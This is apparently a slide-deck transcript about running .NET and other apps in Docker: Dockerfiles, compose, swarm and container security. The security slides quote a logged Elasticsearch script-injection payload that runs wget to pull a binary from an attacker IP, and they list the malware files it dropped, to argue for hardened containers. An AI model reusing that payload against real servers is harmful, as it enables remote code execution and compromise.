Running .NET on Docker

Running .NET on Docker
@Ben_Hall
Ben@BenHall.me.uk
Ocelot Uproar / Katacoda.com

@Ben_Hall / Blog.BenHall.me.uk
WHOAMI?

Learn via Interactive Browser-Based Labs
Katacoda.com

Agenda
• Getting started with Docker
• Windows Containers vs Linux Containers
• Building .NET applications as containers
• Deploying containers
• The future

https://www.docker.com/whatisdocker/
Container

Own Process Space
Own Network Interface
Own Root Directories
Sandboxed
Like a lightweight VM. But it’s not a VM.
Container

Native CPU
Native Memory
Native IO
No Pre-Allocation
No Performance Overheard
Container

Docker - An open platform for distributed
applications for developers and sysadmins.

Batteries included but
removable

> docker run –p 6379:6379 redis:3.0.3
_.-``__ ''-._
_.-`` `. `_. ''-._ Redis 3.0.3 (00000000/0) 64 bit
.-`` .-```. ```/ _.,_ ''-._
( ' , .-` | `, ) Running in standalone mode
|`-._`-...-` __...-.``-._|'` _.-'| Port: 6379
| `-._ `._ / _.-' | PID: 1
`-._ `-._ `-./ _.-' _.-'
|`-._`-._ `-.__.-' _.-'_.-'|
| `-._`-._ _.-'_.-' | http://redis.io
`-._ `-._`-.__.-'_.-' _.-'
|`-._`-._ `-.__.-' _.-'_.-'|
| `-._`-._ _.-'_.-' |
`-._ `-._`-.__.-'_.-' _.-'
`-._ `-.__.-' _.-'
`-._ _.-'
`-.__.-'
1:M 05 Nov 10:42:24.402 # Server started, Redis version 3.0.3
1:M 05 Nov 10:42:24.402 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition.
To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl
vm.overcommit_memory=1' for this to take effect.
1:M 05 Nov 10:42:24.402 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will
create latency and memory usage issues with Redis. To fix this issue run the command 'echo never >
/sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a
reboot. Redis must be restarted after THP is disabled.
1:M 05 Nov 10:42:24.403 # WARNING: The TCP backlog setting of 511 cannot be enforced because
/proc/sys/net/core/somaxconn is set to the lower value of 128.
1:M 05 Nov 10:42:24.403 * The server is now ready to accept connections on port 6379

Installing on OSX / Windows
https://www.docker.com/getdocker

Installing In Production
'curl -sSL https://get.docker.com/ | sh'

Very Simple Host
A computer station that runs
docker daemon

Windows Containers, Linux
Containers

Linux Containers
• Centos, Ubuntu, Alpine
• Binaries built for Linux kernel

Windows Containers
• Windows Server Core, Windows Nano
• Binaries built for Windows

https://www.katacoda.com/courses/dotnet-in-
docker/deploying-aspnet-core-as-docker-container

$ cat Dockerfile-linux
FROM microsoft/dotnet:1.0.0-preview2-sdk

RUN mkdir /app
WORKDIR /app
COPY project.json /app
RUN ["dotnet", "restore"]

RUN mkdir /app
WORKDIR /app
COPY . /app
RUN ["dotnet", "build"]

RUN mkdir /app
WORKDIR /app
COPY . /app
RUN ["dotnet", "build"]
EXPOSE 5000/tcp
CMD ["dotnet", "run"]

$ docker build -t aspnet-app:v0.1 .
$ docker run -d
-t -p 5000:5000
--name app
aspnet-app:v0.1

$ type Dockerfile-windows
FROM microsoft/iis:windowsservercore-10.0.14393.693

SHELL ["powershell", "-command“]

RUN Install-WindowsFeature NET-Framework-45-ASPNET;
Install-WindowsFeature Web-Asp-Net45

RUN Remove-Website -Name 'Default Web Site';
mkdir c:NerdDinner;
New-Website -Name 'nerd-dinner'
-Port 80 -PhysicalPath 'c:NerdDinner'
-ApplicationPool '.NET v4.5‘

SHELL ["powershell", "-command"]
RUN Install-WindowsFeature NET-Framework-45-ASPNET; Install-
WindowsFeature Web-Asp-Net45
RUN Remove-Website -Name 'Default Web Site';
mkdir c:NerdDinner;
New-Website -Name 'nerd-dinner'
-Port 80 -PhysicalPath 'c:NerdDinner'
-ApplicationPool '.NET v4.5‘
EXPOSE 80
COPY NerdDinner c:NerdDinner

> cat Dockerfile
FROM node:6
RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app
COPY . /usr/src/app
RUN npm install
CMD [ "npm", "start" ]
> docker build –t nodeapp .
> docker run –d –p 3000 nodeapp

Debugging Node.js with VS
Code
EXPOSE 3000
EXPOSE 5858
CMD ["node", "--debug=5858","index.js"]
docker run -d -p 3000:3000 -p 5858:5858 nodeapp

Containers can’t fix broken
architectures.
But they can help…

Production isn’t special
Just another environment

Immutable
Disposable Container Pattern

> docker-compose up -d
> cat docker-compose.yml
web:
image: ocelotuproar/katacoda
volumes:
- /opt/projects/katacoda/data:/usr/src/app/data
- /opt/docker/katacoda/db:/usr/src/app/ocelite-db
- /var/run/docker.sock:/var/run/docker.sock
ports:
- 3000
environment:
VIRTUAL_HOST: 'katacoda.com,*.katacoda.com'
NODE_ENV: 'production’
restart: always
// Production version of docker-compose-dev.yml

> docker-compose up # Start containers
–d # In background
Recreating katacoda_nginx_1...
Recreating katacoda_redis_1...
Recreating katacoda_db_1...
Recreating katacoda_elasticsearch_1...
Recreating katacoda_web_1…
> docker-compose stop # Stop containers
Stopping katacoda_web_1...
Stopping katacoda_elasticsearch_1...
Stopping katacoda_db_1...
Stopping katacoda_redis_1...
Stopping katacoda_nginx_1...

• https://www.katacoda.com/courses/docker-
orchestration/
$ docker service create
--name http
--network skynet
--replicas 2
-p 80:80
katacoda/docker-http-server

Constraint Scheduler
$ docker run
-e constraint:ostypelabel==windowscompat
windowservercore cmd
$ docker run
-e constraint:ostypelabel==linuxcompat
ubuntu bash

Microsoft, Apprenda, Red Hat
https://github.com/kubernetes/kubernetes/issues/22623

Common Question: Is it
secure?

Hosting provider becomes
unhappy

org.elasticsearch.search.SearchParseException: [index][3]:
query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse
source
[{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s
cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br
= new BufferedReader(new
InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi
http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new
StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();"
}}}]]
http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/

C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
C /etc/rc1.d
A /etc/rc1.d/S97DbSecuritySpt
A /etc/rc1.d/S99selinux
C /etc/rc2.d
C /etc/rc3.d
C /etc/rc4.d
C /etc/rc5.d
http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
C /etc/ssh
A /etc/ssh/bfgffa
A /os6
A /safe64
C /tmp
A /tmp/.Mm2
A /tmp/64
A /tmp/6Sxx
A /tmp/6Ubb
A /tmp/DDos99
A /tmp/cmd.n
A /tmp/conf.n
A /tmp/ddos8
A /tmp/dp25
A /tmp/frcc
A /tmp/gates.lod
A /tmp/hkddos
A /tmp/hsperfdata_root
A /tmp/linux32
A /tmp/linux64
A /tmp/manager
A /tmp/moni.lod
A /tmp/nb
A /tmp/o32
A /tmp/oba
A /tmp/okml
A /tmp/oni
A /tmp/yn25
C /usr
C /usr/bin
A /usr/bin/.sshd
A /usr/bin/dpkgd
A /usr/bin/dpkgd/netstat
A /usr/bin/dpkgd/ps
A /usr/bin/dpkgd/ss

Read Only Containers
> docker run –-read-only
–v /data:/data
elasticsearch

Is Docker Secure?
• Yes. It’s as secure as your practices
are.
• ElasticSearch hack would have taken over
entire box
• New game, new rules to play by

Your local machine is now the
same as production

RStudio
• docker run -d -p 8787:8787 rocker/rstudio

Docker + Desktop
Applications
https://blog.jessfraz.com/post/doc
ker-containers-on-the-desktop/

It’s amazing, but a little
confusing.
$ docker run -it
-v /etc/localtime:/etc/localtime
-v /tmp/.X11-unix:/tmp/.X11-unix
-e DISPLAY=unix$DISPLAY
--device /dev/snd
--link pulseaudio:pulseaudio
-e PULSE_SERVER=pulseaudio
--device /dev/video0
--name skype
jess/skype

@Ben_Hall
Ben@BenHall.me.uk
Blog.BenHall.me.uk
www.Katacoda.com

Running .NET on Docker

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (20)

Destaque

Destaque (20)

Semelhante a Running .NET on Docker

Semelhante a Running .NET on Docker (20)

Mais de Ben Hall

Mais de Ben Hall (17)

Último

Último (20)

Running .NET on Docker

Notas do Editor